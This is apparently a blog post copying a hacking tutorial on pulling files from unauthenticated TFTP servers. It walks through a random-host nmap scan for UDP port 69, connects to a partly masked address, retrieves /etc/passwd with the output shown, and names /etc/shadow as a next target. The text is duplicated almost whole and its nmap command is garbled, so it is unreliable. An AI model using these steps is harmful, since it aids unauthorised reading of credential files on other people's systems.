TFTP is your friend. TFTP does not require any authentication - it is
usually used for network equipment to get their configurations at boot time.
A router can be set up to TFTP to a Unix/Windows box and get its config from
this box. TFTP makes use of the UDP protocol - and is as such
connectionless.
Normally a TFTP server will allow the attacker to transfer any file to
him/her (/etc/shadow might be a start). The more recent version of the
server will restrict you to only access files that are readable by everyone,
and you might find yourself "jailed" in a directory - like with FTP. The
other restriction on the more recent servers is that the only files that can
be written are those that already exists and that are writeble by everyone.
The other difference between TFTP and FTP is that you need to know what file
you want - there is no "ls" command, but then again, you can make some
intelligent choices.
Let us look at an example (this is really easy, but what the heck). First I
use nmapto find a machine out there with an open TFTP port. Note that for
this scan (a UDP scan) you'll need to allow UDP (duh) and ICMP to enter your
network, as nmaplooks at ICMP port unreachable messages to determine if the
port is open.
# nmap -+output
n -sU -iR -p 69
>tftp
tftp> connect 129.xxx.121.46
> get /etc/password /tmp/passwd
tftp> get /etc/passwd /tmp/passwd
Received 679 bytes in 1.9 seconds
tftp> q
/> more /tmp/passwd
root:*:0:0:System Administrator:/root:/usr/contrib/bin/bash
daemon:*:1:1:System Daemon:/:/sbin/nologin
sys:*:2:2:Operating System:/tmp:/sbin/nologin
bin:*:3:7:BSDI Software:/usr/bsdi:/sbin/nologin
operator:*:5:5:System Operator:/usr/opr:/sbin/nologin
uucp:*:6:6:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucico
games:*:7:13:Games Pseudo-user:/usr/games:/sbin/nologin
news:*:9:8:USENET News,,,:/var/news/etc:/sbin/nologin
demo:*:10:13:Demo User:/usr/demo:/sbin/nologin
www:*:51:84:WWW-server:/var/www:/sbin/nologin
nobody:*:32767:32766:Unprivileged user:/nonexistent:/sbin/nologin
nonroot:*:65534:32766:Non-root root user for NFS:/nonexistent:/sbin/nologin
Note - I transfer the /etc/passwdfile to the temp directory. If you do the
TFTP as root, and you are not careful, you will overwrite your own
/etc/password file :). We have password file - it is shadowed - but we can
now easily get any other file (the real password file etc.).
usually used for network equipment to get their configurations at boot time.
A router can be set up to TFTP to a Unix/Windows box and get its config from
this box. TFTP makes use of the UDP protocol - and is as such
connectionless.
Normally a TFTP server will allow the attacker to transfer any file to
him/her (/etc/shadow might be a start). The more recent version of the
server will restrict you to only access files that are readable by everyone,
and you might find yourself "jailed" in a directory - like with FTP. The
other restriction on the more recent servers is that the only files that can
be written are those that already exists and that are writeble by everyone.
The other difference between TFTP and FTP is that you need to know what file
you want - there is no "ls" command, but then again, you can make some
intelligent choices.
Let us look at an example (this is really easy, but what the heck). First I
use nmapto find a machine out there with an open TFTP port. Note that for
this scan (a UDP scan) you'll need to allow UDP (duh) and ICMP to enter your
network, as nmaplooks at ICMP port unreachable messages to determine if the
port is open.
# nmap -+output
n -sU -iR -p 69
>tftp
tftp> connect 129.xxx.121.46
> get /etc/password /tmp/passwd
tftp> get /etc/passwd /tmp/passwd
Received 679 bytes in 1.9 seconds
tftp> q
/> more /tmp/passwd
root:*:0:0:System Administrator:/root:/usr/contrib/bin/bash
daemon:*:1:1:System Daemon:/:/sbin/nologin
sys:*:2:2:Operating System:/tmp:/sbin/nologin
bin:*:3:7:BSDI Software:/usr/bsdi:/sbin/nologin
operator:*:5:5:System Operator:/usr/opr:/sbin/nologin
uucp:*:6:6:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucico
games:*:7:13:Games Pseudo-user:/usr/games:/sbin/nologin
news:*:9:8:USENET News,,,:/var/news/etc:/sbin/nologin
demo:*:10:13:Demo User:/usr/demo:/sbin/nologin
www:*:51:84:WWW-server:/var/www:/sbin/nologin
nobody:*:32767:32766:Unprivileged user:/nonexistent:/sbin/nologin
nonroot:*:65534:32766:Non-root root user for NFS:/nonexistent:/sbin/nologin
Note - I transfer the /etc/passwdfile to the temp directory. If you do the
TFTP as root, and you are not careful, you will overwrite your own
/etc/password file :). We have password file - it is shadowed - but we can
now easily get any other file (the real password file etc.).
No comments:
Post a Comment